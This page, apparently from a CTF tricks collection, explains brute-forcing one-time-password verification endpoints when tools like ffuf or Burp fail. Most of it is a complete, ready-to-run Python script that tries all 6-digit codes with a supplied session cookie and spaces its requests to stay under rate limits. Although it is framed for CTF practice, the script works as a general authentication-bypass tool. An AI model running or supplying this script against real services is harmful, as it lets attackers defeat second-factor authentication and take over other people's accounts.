> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/authentication-bypass/bruteforce/trick-0283.md).

# Brute-force OTP with Script

***

When standard tools like ffuf or Burp Suite fail to brute-force an OTP endpoint, a specialized script might be necessary. This often occurs due to application-specific logic, timing requirements, or unique request structures that generic fuzzers cannot handle.

The script typically requires parameters such as the target IP, port, and an authenticated session cookie to interact with the verification endpoint and iterate through possible OTP values within the validity window. A simple Python script using the `requests` library can automate this process. The script needs to iterate through possible OTP values, which are typically 6 digits (000000 to 999999). Key parameters for such a script include the target URL, the request data structure (where the OTP is placed, often using a placeholder), an authenticated session cookie, and a string to identify a successful response in the server's reply. Adding a small delay between requests can help avoid triggering rate limits, although this might slow down the brute-force process.

The script below demonstrates a basic structure:

```python
import requests
import argparse
import time

def brute_force_otp(url, data, cookie, success_string, start, end, delay, method):
    headers = {
        "Cookie": cookie,
        "Content-Type": "application/x-www-form-urlencoded" # Example, adjust as needed
    }

    for otp in range(start, end + 1):
        otp_str = str(otp).zfill(6) # Assuming 6-digit OTPs, adjust padding as needed
        # Assuming 'otp' is the parameter name in the request data
        payload = data.replace("OTP_PLACEHOLDER", otp_str)

        try:
            if method.upper() == "POST":
                response = requests.post(url, headers=headers, data=payload)
            elif method.upper() == "GET":
                 response = requests.get(url, headers=headers, params=payload) # Assuming data is query params
            else:
                 print(f"Unsupported method: {method}")
                 return

            print(f"[*] Trying OTP: {otp_str} | Status: {response.status_code}")

            if success_string in response.text:
                print(f"[+] Success! Found valid OTP: {otp_str}")
                return

            time.sleep(delay)

        except requests.exceptions.RequestException as e:
            print(f"[-] Error sending request for OTP {otp_str}: {e}")
        except Exception as e:
            print(f"[-] An unexpected error occurred: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Brute-force OTP endpoint")
    parser.add_argument("-u", "--url", required=True, help="Target URL")
    parser.add_argument("-d", "--data", required=True, help="Request data template (e.g., 'username=test&otp=OTP_PLACEHOLDER')")
    parser.add_argument("-c", "--cookie", required=True, help="Authenticated session cookie")
    parser.add_argument("-s", "--success-string", required=True, help="String indicating success in the response")
    parser.add_argument("--start", type=int, default=0, help="Starting OTP (default: 0)")
    parser.add_argument("--end", type=int, default=999999, help="Ending OTP (default: 999999 for 6 digits)")
    parser.add_argument("--delay", type=float, default=0.1, help="Delay between requests in seconds (default: 0.1)")
    parser.add_argument("--method", default="POST", help="HTTP method (POST or GET, default: POST)")

    args = parser.parse_args()

    brute_force_otp(
        args.url,
        args.data,
        args.cookie,
        args.success_string,
        args.start,
        args.end,
        args.delay,
        args.method
    )
```

This script takes the target URL, the request body or parameters containing an `OTP_PLACEHOLDER`, the session cookie, a string to identify success in the response, the starting and ending OTP values for the range, a delay between requests, and the HTTP method (POST or GET) as command-line arguments. It iterates through the specified range, substituting the `OTP_PLACEHOLDER` with the current OTP value, sends the request, and checks the response for the success string. The delay helps manage potential rate limits.
